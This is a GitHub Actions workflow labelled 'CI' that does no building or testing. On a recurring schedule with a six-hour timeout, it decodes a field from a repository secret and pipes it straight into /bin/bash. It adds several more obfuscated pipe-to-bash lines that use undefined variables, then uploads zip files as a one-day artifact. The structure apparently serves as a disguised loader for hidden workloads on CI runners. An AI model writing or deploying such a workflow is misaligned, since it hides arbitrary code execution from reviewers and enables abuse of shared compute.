name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '10 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          ukt2509: ${{ secrets.ukt2509 }}
        run: |
          printf '%s' "$ukt2509" | jq -r .m08 | /bin/bash
          echo $roesv45099 | jq -r .lrwm6386 | /bin/bash
          echo $k49 | jq -r .mr01 | /bin/bash
          printf '%s' "$zeuel86" | jq -r .dyvj60 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: yDb3vzSg
          path: "*.zip"
          retention-days: 1
